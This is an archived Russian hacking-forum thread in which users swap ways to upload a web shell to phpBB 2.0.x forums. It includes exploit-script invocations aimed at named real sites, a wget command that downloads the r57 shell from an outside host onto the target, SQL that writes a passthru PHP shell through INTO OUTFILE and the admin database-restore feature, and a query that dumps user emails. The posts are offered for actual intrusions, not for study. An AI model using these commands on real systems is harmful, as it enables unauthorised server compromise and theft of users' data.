Просмотр полной версии : phpBB. Как залить шелл через уязвимость в admin_styles?
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux
wget -o серверный_путь путь_к_твоему_шеллу.
В следующий раз попробуй найти это через поиск.
зы. wget может вообще не быть. В общем всё это ещё раз описывалось в течении двух последних дней.
чтото не кактит...
з.Ы. wget есть точно...
юзал так
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o /home/webadmin/pvp-alfa.com.ru/html/phpBB2/cache/r57
.php http://games.tenet.ua/board/uploads/r57.php"
и так
V:\Kxe\exploit>admin.pl -p http://pvp-alfa.ru/phpBB2/admin/ -s 772dfdcc06191a8f3
da9b8e161c6856e -c "wget -o r57.php http://games.tenet.ua/board/uploads/r57.php"
Как залить шелл? есть админка, есть r57phpbb_admin.pl
юзаю его... пытаюсь сдлеать wget не пашет... как правельно юзать wget? может я чтото неправельно написал?
З.Ы. стоит Linux
Поюзай поиск на форуме это уже обсуждалось !
Azazel правильно сказал !
_-[A.M.D]HiM@S-_
13.01.2006, 20:44
Через БД
HiM@S-_']Через БД
а не влом сливать 30 метров базы к примеру править её и заливать обратно ????
а если как на этом форуме http://пожалуста.безссылок.ru
Там пользователей и тем валом у них база 1GB весит не бось....
Так что это не вариант.....
_-[A.M.D]HiM@S-_
13.01.2006, 22:21
Там помойму стоит 2.0.16
SELECT email FROM users INTO OUTFILE 'c:/text.txt'
это для мейлов, дла хешей немного другая команда в БД
сливать базу не обязательно можно и подругому - так создать файл с содержанием:
UPDATE phpbb_categories SET cat_title='<? passthru("$cmd"); ?>'WHERE cat_id=1;
SELECT cat_title INTO OUTFILE '/home/bla_bla_bla/shell.php' FROM phpbb_categories where cat_id=1;
потом просто выбираешь в админке восстановить базу и указываешь путь к этому файу. это создаст шел не испортив основную базу.
еще вопрос как с помощью r57phpbb_admin2exec.pl
скачать файл с сервака по которому я лазию к себе на комп?
а не влом сливать 30 метров базы к примеру править её и заливать обратно ????
а если как на этом форуме http://пожалуста.безссылок.ru
Там пользователей и тем валом у них база 1GB весит не бось....
Так что это не вариант.....
Ты можешь представить себе 1 Gb текста?
БД почтовых отделений России весит около 4 М и имеет около 40 000 записей. Думаю с 1 Gb ты перебрал малость :)
сливать базу не обязательно можно и подругому - так создать файл с содержанием:
UPDATE phpbb_categories SET cat_title='<? passthru("$cmd"); ?>'WHERE cat_id=1;
SELECT cat_title INTO OUTFILE '/home/bla_bla_bla/shell.php' FROM phpbb_categories where cat_id=1;
потом просто выбираешь в админке восстановить базу и указываешь путь к этому файу. это создаст шел не испортив основную базу.
сделал как сверху описано вот што пишет:
Error importing backup file
DEBUG MODE
SQL Error : 1045 Access denied for user: 'faircа@localhost' (Using password: YES)
SELECT cat_title INTO OUTFILE '/home/fairca/public_html/forum/avatars/sh.php' FROM phpbb_categories where cat_id=1
Line : 983
File : /home/fairca/public_html/forum/admin/admin_db_utilities.php
может кто знает как ето можно поправит :confused:
попробуй поюзать gwee-должен работать со ВСЕМИ осями. Шелл почти 100%
что вы все мля через екзек то делаете , не проще проинклудить ченить посмотреть куда прав хватит и через аплоад стандартный если очень надо
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot